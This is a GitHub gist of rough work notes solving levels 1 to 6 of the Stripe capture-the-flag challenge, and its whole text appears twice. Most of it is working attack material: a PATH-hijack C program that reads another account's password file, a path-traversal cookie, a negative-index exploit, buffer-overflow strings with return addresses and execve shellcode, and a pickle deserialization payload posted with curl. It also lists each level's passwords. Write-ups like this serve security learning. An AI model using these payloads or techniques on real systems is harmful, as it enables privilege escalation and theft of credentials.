michaelpetrov/gist:1899630

## gistfile1.txt
Stripe CTF - Work Notes
mpetrov (petrov.michael@gmail.com)

These notes are very rough. They should give a general idea of how each level was solved.

---- LEVEL 01 (login: e9gx26YEb2) -----
Solution: modifying PATH env variable
Password: kxlVXUvzv

date.c
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
int main(void) {
    printf(
        "         UID           GID  \n"
        "Real      %d  Real      %d  \n"
        "Effective %d  Effective %d  \n",
             getuid (),     getgid (),
             geteuid(),     getegid()
    );
	system("ls -la /home/level02/");
	system("cat /home/level02/.password");
    return 0;       /* always good to return something */
}


---- LEVEL 02 (login: kxlVXUvzv) -----
Solution: set cookie to: ../../home/level03/.password
Password: Or0m4UX07b


---- LEVEL 03 (login: Or0m4UX07b) -----
Solution: negative index exploit
Password: i5cBbPvPCpcP

NotesROUGH NOTES:
- target function (using nm): 0x804875b 	run
- use gdb to break in truncate_and_call
- step through a bit
- get pointer of buf
- compare to pointer of fns
- -0x70 difference, negative index exploit about to work
- array pointers are 4 bytes apart
- run -26 $'./a.out\n\x5b\x87\x04\x08'


---- LEVEL 04 (login: i5cBbPvPCpcP) -----
Solution: buffer overflow exploit
Password: fzfDGnSmd317


ROUGH NOTES:
- some overflow...
- system is 0x890cec83
- "smashing the stack for fun and profit"
- brute force isolation of return pointer (1037 th character)

$'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x23\x5d\xf7AAAAAAAAAAAA'

- printf("Usage: ./level04 STRING");, ./level04 is key (turned out to be irrelevant at the end)
- 0x080485b7:	 "./level04 STRING"
- gdb: x/x system 0xf75d23d0 <system>:	0x890cec83
- found "call *eax 804847f" in disassembly
- Shellcode creator: http://www.shell-storm.org/shellcode/files/utility-478.php
- Shellcode for "./a.out\n":
// 48 bytes
$'\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2e\x2f\x61\x2e\x6f\x75\x74\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7f\x84\x04\x08AAAAAAAAAAAA'


---- LEVEL 05 (login: fzfDGnSmd317) -----
Solution: unpickle exploit
Password: SF2w8qU1QDj


ROUGH NOTES
- touch result.txt
- chmod 777 result.txt
- curl localhost:9020 -d $'test; job: cos\nsystem\n(S\'/tmp/tmp.jbvQGmqMNk/a.out\'\ntR.'
- exploit code (primitive but works):
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
int main(void) {
    printf(
        "         UID           GID  \n"
        "Real      %d  Real      %d  \n"
        "Effective %d  Effective %d  \n",
             getuid (),     getgid (),
             geteuid(),     getegid()
    );
	system("ls -la /home/level06/ >> /tmp/tmp.jbvQGmqMNk/result.txt");
	system("cat /home/level06/.password >> /tmp/tmp.jbvQGmqMNk/result.txt");
    return 0;       /* always good to return something */
}

cat result.txt
- SUCCESS!


---- LEVEL 06 (login: SF2w8qU1QDj) -----
Solution: timing attack on the fork system call
Details: https://gist.github.com/1899389
Password: theflagl0eFTtT5oi0nOTxO5

ROUGH NOTES:
- had to ssh through level05 for some reason (later was fixed)
- if stdout and stderr can be blocking then we can time their outputs and find where the wrong characters are
- http://stackoverflow.com/questions/280571/how-to-control-popen-stdin-stdout-stderr-redirection
- http://stackoverflow.com/questions/4057985/disabling-stdout-buffering-of-a-forked-process
- https://bugzilla.redhat.com/attachment.cgi?id=91467
	Stripe CTF - Work Notes
	mpetrov (petrov.michael@gmail.com)

	These notes are very rough. They should give a general idea of how each level was solved.

	---- LEVEL 01 (login: e9gx26YEb2) -----
	Solution: modifying PATH env variable
	Password: kxlVXUvzv

	date.c
	#include <sys/types.h>
	#include <unistd.h>
	#include <stdio.h>
	int main(void) {
	printf(
	" UID GID \n"
	"Real %d Real %d \n"
	"Effective %d Effective %d \n",
	getuid (), getgid (),
	geteuid(), getegid()
	);
	system("ls -la /home/level02/");
	system("cat /home/level02/.password");
	return 0; /* always good to return something */
	}


	---- LEVEL 02 (login: kxlVXUvzv) -----
	Solution: set cookie to: ../../home/level03/.password
	Password: Or0m4UX07b




	---- LEVEL 03 (login: Or0m4UX07b) -----
	Solution: negative index exploit
	Password: i5cBbPvPCpcP

	NotesROUGH NOTES:
	- target function (using nm): 0x804875b run
	- use gdb to break in truncate_and_call
	- step through a bit
	- get pointer of buf
	- compare to pointer of fns
	- -0x70 difference, negative index exploit about to work
	- array pointers are 4 bytes apart
	- run -26 $'./a.out\n\x5b\x87\x04\x08'


	---- LEVEL 04 (login: i5cBbPvPCpcP) -----
	Solution: buffer overflow exploit
	Password: fzfDGnSmd317


	ROUGH NOTES:
	- some overflow...
	- system is 0x890cec83
	- "smashing the stack for fun and profit"
	- brute force isolation of return pointer (1037 th character)

	$'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x23\x5d\xf7AAAAAAAAAAAA'

	- printf("Usage: ./level04 STRING");, ./level04 is key (turned out to be irrelevant at the end)
	- 0x080485b7: "./level04 STRING"
	- gdb: x/x system 0xf75d23d0 <system>: 0x890cec83
	- found "call *eax 804847f" in disassembly
	- Shellcode creator: http://www.shell-storm.org/shellcode/files/utility-478.php
	- Shellcode for "./a.out\n":
	// 48 bytes
	$'\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2e\x2f\x61\x2e\x6f\x75\x74\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7f\x84\x04\x08AAAAAAAAAAAA'



	---- LEVEL 05 (login: fzfDGnSmd317) -----
	Solution: unpickle exploit
	Password: SF2w8qU1QDj



	ROUGH NOTES
	- touch result.txt
	- chmod 777 result.txt
	- curl localhost:9020 -d $'test; job: cos\nsystem\n(S\'/tmp/tmp.jbvQGmqMNk/a.out\'\ntR.'
	- exploit code (primitive but works):
	#include <sys/types.h>
	#include <unistd.h>
	#include <stdio.h>
	int main(void) {
	printf(
	" UID GID \n"
	"Real %d Real %d \n"
	"Effective %d Effective %d \n",
	getuid (), getgid (),
	geteuid(), getegid()
	);
	system("ls -la /home/level06/ >> /tmp/tmp.jbvQGmqMNk/result.txt");
	system("cat /home/level06/.password >> /tmp/tmp.jbvQGmqMNk/result.txt");
	return 0; /* always good to return something */
	}

	cat result.txt
	- SUCCESS!


	---- LEVEL 06 (login: SF2w8qU1QDj) -----
	Solution: timing attack on the fork system call
	Details: https://gist.github.com/1899389
	Password: theflagl0eFTtT5oi0nOTxO5

	ROUGH NOTES:
	- had to ssh through level05 for some reason (later was fixed)
	- if stdout and stderr can be blocking then we can time their outputs and find where the wrong characters are
	- http://stackoverflow.com/questions/280571/how-to-control-popen-stdin-stdout-stderr-redirection
	- http://stackoverflow.com/questions/4057985/disabling-stdout-buffering-of-a-forked-process
	- https://bugzilla.redhat.com/attachment.cgi?id=91467